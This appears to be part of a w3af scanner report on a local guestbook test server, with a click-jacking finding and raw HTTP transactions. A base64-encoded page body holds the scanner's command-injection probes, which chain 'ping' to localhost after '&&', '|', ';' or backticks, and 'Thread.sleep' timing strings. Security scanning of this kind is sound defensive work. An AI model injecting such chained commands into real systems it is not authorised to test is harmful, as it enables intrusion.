KTs8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAg
PHA+NTY8L3A+CiAgICAgICAgPHA+VGhyZWFkLnNsZWVwKDMwMDApOzwvcD4KICAgICAgICA8aHIg
Lz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8
aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAg
ICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAg
ICAgICA8aHIgLz4KICAgICAgICA8cD4mJnBpbmcgLW4gNCBsb2NhbGhvc3Q8L3A+CiAgICAgICAg
PHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAg
ICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAg
ICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+
CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8
L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAg
PHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAg
ICAgPHA+VGhyZWFkLlNsZWVwKDMwMDApOzwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4K
ICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5UaHJlYWQuU2xlZXAo
MzAwMCk7PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPiYmcGluZyAtYyA0IGxvY2Fs
aG9zdDwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAg
ICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAg
ICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4K
ICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIg
Lz4KICAgICAgICA8cD4mJi91c3Ivc2Jpbi9waW5nIC1zIGxvY2FsPC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAg
ICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPnxwaW5nIC1u
IDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAg
IDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPnxwaW5nIC1jIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAg
ICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgog
ICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPnwvdXNy
L3NiaW4vcGluZyAtcyBsb2NhbGg8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+
CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8
L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+O3BpbmcgLW4gNCBsb2NhbGhvc3Q8L3A+CiAg
ICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+
CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8
L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAg
PHA+O3BpbmcgLWMgNCBsb2NhbGhvc3Q8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+
CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8
L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29y
bGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+Oy91c3Ivc2Jpbi9waW5nIC1zIGxvY2Fs
aDwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8
cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAg
ICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAg
ICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4K
ICAgICAgICA8cD5gcGluZyAtbiA0IGxvY2FsaG9zdGA8L3A+CiAgICAgICAgPHA+SGVsbG8gV29y
bGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8g
V29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVs
bG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+
SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+YHBpbmcgLWMgNCBsb2Nh
bGhvc3RgPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAg
ICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgog
ICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPnJ1biBwaW5nIC1uIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAg
ICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgog
ICAgICAgIDxwPnBpbmcgLW4gNCBsb2NhbGhvc3Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAg
PHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAg
ICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAg
ICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+
CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+cGluZyAtYyA0IGxvY2FsaG9zdDwvcD4KICAg
ICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4K
ICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwv
cD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3Js
ZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD4vdXNyL3Ni
aW4vcGluZyAtcyBsb2NhbGhvc3QgNDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41Njwv
cD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41
NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8
cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAg
ICA8cD41NjwvcD4KICAgICAgICA8cD4mJnBpbmcgLW4gNCBsb2NhbGhvc3Q8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+
CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+JiZwaW5nIC1jIDQg
bG9jYWxob3N0PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAg
ICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgog
ICAgICAgIDxwPiYmL3Vzci9zYmluL3BpbmcgLXMgbG9jYWxob3N0IDQ8L3A+CiAgICAgICAgPGhy
IC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+fHBpbmcgLW4gNCBsb2Nh
bGhvc3Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVs
bG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+
SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAg
PHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAg
ICAgPHA+fHBpbmcgLWMgNCBsb2NhbGhvc3Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAg
PHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAg
ICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAg
ICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+fC91c3Ivc2Jpbi9waW5nIC1zIGxvY2FsaG9zdCA0
PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdv
cmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxv
IFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PjtwaW5nIC1uIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9w
PgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2
PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxw
PjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAg
IDxwPjU2PC9wPgogICAgICAgIDxwPjtwaW5nIC1jIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAg
IDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgog
ICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPjsvdXNyL3NiaW4vcGlu
ZyAtcyBsb2NhbGhvc3QgNDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAg
ICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4K
ICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41Njwv
cD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41
NjwvcD4KICAgICAgICA8cD5gcGluZyAtbiA0IGxvY2FsaG9zdGA8L3A+CiAgICAgICAgPGhyIC8+
CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhy
IC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+YHBpbmcgLWMgNCBsb2NhbGhv
c3RgPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxv
IFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPnJ1biBwaW5nIC1uIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxw
PjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgo=
</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[16, 110, 112, 116, 137, 143, 174, 196, 201, 202, 203, 204, 206, 207, 210, 211, 212, 213, 214, 215, 216, 217, 218, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 233, 235, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 256, 257, 258, 259, 260, 261, 262, 267, 268, 269, 270, 271, 272, 273, 275, 291, 304, 305, 306, 307, 308, 309, 310, 314, 315, 316, 317, 318, 320, 321, 322, 323, 325, 327, 329, 330, 331, 332, 333, 334, 337, 338, 339, 340, 341, 344, 345, 347, 353, 355, 356, 358, 359, 360, 361, 362, 363, 364, 366, 367, 369, 371, 384, 385, 394, 411, 418, 422, 425, 433, 434, 435, 447, 468, 484, 492, 529, 531, 535, 538, 541, 543, 547, 548, 549, 550, 551, 555, 563, 570, 624, 667, 721, 761, 764, 790, 814, 815, 820, 828, 844, 845, 847, 852, 855, 863, 868, 882, 900, 913, 929, 936, 945, 952, 961, 968, 977, 984, 993, 1000, 1009, 1015]" method="GET" name="Click-Jacking vulnerability" plugin="click_jacking" severity="Medium" url="None" var="None">
        <description>The whole target has no protection (X-Frame-Options header) against Click-Jacking attacks. This vulnerability was found in the requests with ids 16, 110, 112, 116, 137, 143, 174, 196, 201 to 204, 206 to 207, 210 to 218, 220 to 231, 233, 235, 237 to 254, 256 to 262, 267 to 273, 275, 291, 304 to 310, 314 to 318, 320 to 323, 325, 327, 329 to 334, 337 to 341, 344 to 345, 347, 353, 355 to 356, 358 to 364, 366 to 367, 369, 371, 384 to 385, 394, 411, 418, 422, 425, 433 to 435, 447, 468, 484, 492, 529, 531, 535, 538, 541, 543, 547 to 551, 555, 563, 570, 624, 667, 721, 761, 764, 790, 814 to 815, 820, 828, 844 to 845, 847, 852, 855, 863, 868, 882, 900, 913, 929, 936, 945, 952, 961, 968, 977, 984, 993, 1000, 1009 and 1015.</description>
        <http-transactions>
            <http-transaction id="16">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="110">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/favicon.ico HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/favicon.ico&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="112">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/_vti_inf.html HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/_vti_inf.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="116">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/USnBl.html HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/USnBl.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="137">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/server-status HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="143">
                <httprequest>
                    <status>POST http://192.168.0.116:31337/_vti_bin/_vti_aut/author.dll HTTP/1.1</status>
                    <headers>
                        <header content="158" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWV0aG9kPXB1dCBkb2N1bWVudDo0LjAuMi40NzE1JnNlcnZpY2VfbmFtZT0mZG9jdW1lbnQ9W2Rv
Y3VtZW50X25hbWU9L1VTbkJsLmh0bWw7bWV0YV9pbmZvPVtdXSZwdXRfb3B0aW9uPW92ZXJ3cml0
ZSZjb21tZW50PSZrZWVwX2NoZWNrZWRfb3V0PWZhbHNlCmxtdGgubEJuU1U=
</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="561" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/_vti_bin/_vti_aut/author.dll&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="174">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/robots.txt HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
